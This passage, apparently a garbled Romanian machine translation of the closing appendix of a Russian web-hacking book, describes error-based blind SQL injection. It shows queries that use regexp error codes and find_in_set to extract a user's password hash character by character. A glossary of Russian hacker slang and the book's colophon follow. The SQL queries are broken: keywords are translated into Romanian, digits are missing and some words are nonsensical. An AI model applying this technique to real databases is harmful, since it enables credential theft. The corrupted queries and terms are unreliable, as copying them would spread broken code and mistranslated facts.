echilibrate” de la expresia regulată selectați expresie regizată dacă (l=l,'[ - ]', ) # - A apărut eroarea „interval de caractere nevalid” de la expresia regulată selectați expresie regizată dacă (l=l,'[[ ch ]]', ) # - S-a primit eroarea „element de colating nevalid” de la expresia regulată selectați expresie regulată dacă (l=l, 'W , ) # - S-a produs eroarea „slash backslash (\)” de la expresia regulată Anexa Tehnici de injectare SQL Quick Blind Acum să combinăm aceste interogări cu funcția f nd i n set() Dacă caracterul dorit se află în setul de subșiruri, va returna numărul subșirului, dacă nu, va returna Să formăm următoarea interogare: selectați * din utilizatorii unde id=-l ȘI „x” regexp concat( "x{ ", f(f nd n set(substr ng((selectați parola de acces de la utilizatori) unde id=l),l,l), 'a b c^ e M L b b')> , ( selectați uniune selectați ), „ }”)) Dacă primul caracter al parolei este în setul „a b c^ eT I^ L b b”, atunci interogarea va returna următoarele: # - Subinterogarea returnează mai mult de rând În caz contrar, va reveni: # - S-a primit eroarea „număr(e) de repetiții invalid(e)” de la expresia regulată Adică, la fiecare solicitare, prin codul de eroare, poți afla din ce grup aparține simbolul Hackerul aranjează simbolurile în grupuri astfel încât să minimizeze numărul de apeluri către server În cazul unui hash mdS, se știe că numai caracterele din intervalul [ - , a - f ] pot fi prezente De asemenea, se știe că numărul de stări diferite este ( erori plus o stare când nu există nicio eroare) Apoi obținem, de exemplu: [ ] : 'O' 'b' 'c' 'd' 'e' 'f' [ ]: „G [ ] : „ ” [ ] : „ ” [ ] : „ ” [ ] : „ ” [ ] : „b” [ ] : „ ” [ ] : „ ” [ ] : „ ” [și]: „a” Simbolurile sunt distribuite astfel încât să minimizeze numărul de solicitări, deoarece la fiecare solicitare hackerul învață numărul grupului în care se află simbolul Dacă simbolul este în grupurile de la la , atunci hackerul își va afla semnificația cu o singură solicitare Dacă simbolul aparține grupului , atunci cu următoarea solicitare, hackerul distribuie simbolurile în grupuri în mod diferit și află imediat numărul simbolului: [ ]: „O” [ ] : „b” [ ]: „C [ ] : „d” [ ] : „e” [ ]: „G Algoritmul pentru lucrul cu SQL pare destul de simplu Folosind find in set() + morelrow Caracterele alfabetului sunt repartizate optim în grupuri Pe baza codului de răspuns returnat se află în ce grup se află simbolul din baza de date Dacă există un singur simbol în acest grup, atunci acesta este afișat pe ecran, dacă sunt mai multe, simbolurile din acest grup sunt aranjate în funcție de stările lor, după care revenim la pasul Este clar că scrierea manuală a unor astfel de interogări este complet nerealistă, de exemplu, o interogare pentru alfabetul [az, AZ, - ] și statele ocupă aproape jumătate de pagină de text de carte Prin urmare, ar trebui să utilizați un script care generează automat cereri cu condiții imbricate în conformitate cu algoritmul descris, le trimite și, pe baza răspunsului, determină dacă mai merită să trimiteți cereri sau dacă simbolul a fost deja găsit Se estimează că această metodă utilizează aproximativ de solicitări pe hash tI Avantajele metodei: О viteza mare de lucru; Despre versatilitate Dezavantajele metodei includ faptul că poate funcționa numai dacă site-ul are modul de ieșire a erorilor activat Dicționar hacker Printre hackerii vorbitori de limbă rusă, propriul lor jargon s-a format de mult timp Majoritatea cuvintelor sunt transliterații ale termenilor englezi, adesea transformate în conformitate cu legile limbii noastre Pe baza analizei problemelor revistei Hacker, a altor publicații tipărite și a publicațiilor de pe Internet, am alcătuit un mic dicționar de termeni pentru hackeri Unii dintre termenii de mai sus sunt populari nu numai printre hackeri, ci și printre specialiștii din domenii conexe (programatori, administratori de sistem, utilizatori de computere) Exploita-ul O-day este cel mai recent exploit care nu a fost încă lansat publicului larg -byte - vezi null-byte jtr - vezi john abend (abend, sau aborption end) - terminarea anormală a programului avort (avort) - terminarea de urgență (întreruperea) a programului, abuz (abuz) - o plângere cu privire la acțiunile unui hacker gazdă antiglonț - o gazdă a cărei administrație nu acordă atenție plângerilor primite cu privire la acțiunile hackerilor care au conturi pe această gazdă admin (admin) - administrator acc - vezi cont cont (cont) - un cont, adică un nume de utilizator și o parolă pepene verde - vezi abuz ICQ (asya, asechka) este un program ICQ (ICQ), un popular pager de internet blackhat, blackhat (pălărie neagră) - un hacker care încalcă legea pentru câștig personal brutfbrser este un instrument de forță brută pentru parole Dicționar hacker bsdya este sistemul de operare FreeBSD (uneori BSD, NetBSD sau OpenBSD) whitehat, whitehat (pălărie albă) - un hacker care nu încalcă legea, dar ajută la eliminarea vulnerabilităților, vezi și blackhat și greyhat Windows este sistemul de operare Windows șurub - hard disk vir (vige) este un virus informatic hydra - program Hydra greyhat, greyhat (pălărie gri sau pălărie gri) - un hacker care se comportă fie ca pălărie albă, fie ca pălărie neagră DDoS (Distributed Denial of Service, DDoS) este un atac distribuit de denial of service dedik (de la dedicat) - un server dedicat john este software-ul John The Ripper jonik - vezi john dira - director, director, folder DOS (Denial of Service, DoS) este un atac de denial of service lemne de foc - soferi toad - limbaj Java (a se citi „java”) zhabaskryp, zhabaskrypt - limbaj JavaScript zadosit - dezactivați computerul prin atac DoS comanda (din uz) - folosire injectează (injectează) - „injectează” codul, vezi injectare inklud (include) - includerea textului dintr-un alt fișier în programul principal including (inclusiv) - vezi inklud include (include) - verb de la include injectare (injectare) - „injectare” de cod, adică includerea codului scris de un hacker într-un program existent irka (IRC) este un program de chat kirder - o persoană care falsifică carduri de credit kirding - utilizarea cardurilor de credit ale altcuiva sau false keyboard (a) (keyboard) - tastatură keygen (keygen) - generator de numere de serie clave - tastatură cod (cod) - un program sau instrucțiuni individuale scrise într-un limbaj de programare Anexa Dicționar hacker codificare (coding) - programare cbdit - scrie un program scoarță (durere) - nucleul sistemului de operare program pisoi - netcat crack (crack) - un mic program care sparge orice program plătit cool hacker - un hacker cool (deseori cu o conotație denigratoare) lymer (Iateg) - un utilizator neexperimentat, o victimă a hackerilor; sau o persoană ignorantă de calculatoare care nu vrea să învețe linux (distorsionat) - Linux jurnal (jurnal) - un jurnal (un fișier pentru înregistrarea evenimentelor de sistem sau program de aplicație) lowiper (log-wiper) - un program care curăță jurnalele (vezi jurnalul) login (login) - nume de utilizator pentru a vă conecta în sistem mazahaka - blestemă „mazahaka” în legătură cu hackerii Mazda (de la must die) - ceva rău, nerecomandat; sau MS Windows, malware (malware) - programe rău intenționate bărbat - abr din manual manual (manual) - un ghid (cu privire la ceva, cum ar fi un limbaj de programare) masthev (must have) - ceva foarte bun, recomandat pentru utilizare melkosoft, melkos sau melkosoft - Microsoft Mirka (mIRC) este un program de chat Monique este monitor musculare - MySQL DBMS soap (mail) - e-mail, e-mail soapbox - o cutie poștală electronică, spumă - scrie un e-mail, netkat - program netcat (ps) nickname (nick, nickname) - nickname sau login niks este un sistem de operare asemănător Unix null (nuli) - o valoare goală, de exemplu, într-o bază de date null-byte (null-byte, O-byte) - un octet nul Dicționar hacker nuke (peak) - un program de hacker care blochează computerul victimei, nuke - vezi nuke opsos este un operator de telefonie mobilă axa (OS) — sistem de operare, OS public sploit - o exploatare publică, adică o exploatare care este disponibilă public pe Internet, spre deosebire de un sploit de zile pass (pass, prescurtare pentru parola) - parola python, python - limbaj Python sau interpret Python semiaxis - sistem de operare OS / de la IBM (deja a încetat să mai existe) strica roaba (de la rădăcină) - obțineți drepturile unui utilizator privilegiat pe computer poіbzanny (din uz) - folosit arăta (din uz) - folos, folos pr - furnizor (companie care furnizează servicii Internet), php - limbaj PHP sau interpret în limbaj PHP rut (rădăcină) - superutilizator în sistemele *n x root - Aparținând rădăcinii superutilizatorului rootshell - coajă de rădăcină sanoska, sanos - sistemul de operare SunOS brute pass — găsiți parola folosind un brute-forcer secure, secure (secure) - sigur server – server bufet - vezi server cântăreț - un inginer social, adică o persoană care utilizează metode de inginerie socială sysadmin - administrator de sistem scriptosos - vezi scriptkiddy scriptkiddie este un nume dezaprobator pentru hackerii începători care, fără a pătrunde în esență, caută să folosească exploiturile altora scriptkiddis - vezi scriptkiddy skul, skuel - limbaj SQL și, uneori, injecție SQL sniffer, sniffer (sniffer) - un program care interceptează ceva (pachete, cookie-uri) solar, motorina - sistem de operare Solaris Anexa Dicționar hacker software (soft) - programe, software softina este un program a spear - a fura sploit, sploit (sploit) - o formă scurtă a cuvântului exploit roaba - calculator TV (învechit) - monitor Mătușa Asya - programul ICQ (vezi ICQ) tipsy (sfaturi) - instrucțiuni, sfaturi trucuri (tricks) - trucuri (în hacking sau programare), troy - vezi troian trojan este un program troian Troian (învechit) - vezi Troian tuke este sistemul de operare Linux (pingguinul tuke este simbolul acestuia) uyn (număr de identificare a utilizatorului, UIN) - numărul ICQ utila - utilitar, program utilitar f£ki - întrebări frecvente (Întrebări frecvente, Întrebări frecvente) sau blesteme phishing - înșelăciunea utilizatorilor cu furtul de date confidențiale flood, flood (flood) - un flux de mesaje fără sens sau repetitive, frya - sistemul de operare FreeBSD fryaha - vezi frya hack (hack) - piratare sau îmbunătățire a programului hacking (hacking) - procesul de hacking, arta de a hacking sau de a îmbunătăți ceva hacker - hacker hacking - vezi hacking hacker este un hacker gazdă (gazdă) - un computer pe Internet, un server care găzduiește site-uri, găzduire - servicii de găzduire a site-urilor hacker - hacker vierme - vezi vierme vierme - vierme de internet (vierme de internet), un program de autopropagare shell (shell) - shell de comandă sau acces la linia de comandă Dicționar hacker șase cifre - numere ICQ din șase cifre, adesea servesc ca subiect al deturnării de către hackeri exploit (exploat) - un program de hacker care exploatează o anumită vulnerabilitate idzat (din uz) - folosire, vezi și folosire, folosire, folosire usa - vezi utilizator ibzer (utilizator) - utilizator yuin - vezi câștig Yuri Vladilenovich Jukov Elemente de bază ale hackingului web: ofensă și apărare (+DVD) editia a -a Manager editorial Manager de proiect Editor principal Editor de artă Coritor de corecturi Aspect A Krivtsov A Krivtsov Yu Sergienko L Adu ponderal I Timofeeva L Kharitonov OOO „Lumea cărților”, , Sankt Petersburg, autostrada Peterhof, , lit A Semnat pentru publicare la Format x / Conv p l Ediția Ordin Tipărit folosind tehnologia CtP la OAO First Exemplary Printing House, o subdiviziune separată a Printing Yard , Sankt Petersburg, pr Chkalovsky, LABORATOR ANTI-VIRUS SAN PETERSBURG DANILOV www SALD ru ( ) - E Antoivorysnye produse software Tema: Hacking Nivel de utilizator: Avansat [^PETER ISBN: - - - - toate informațiile despre cărți și magazin online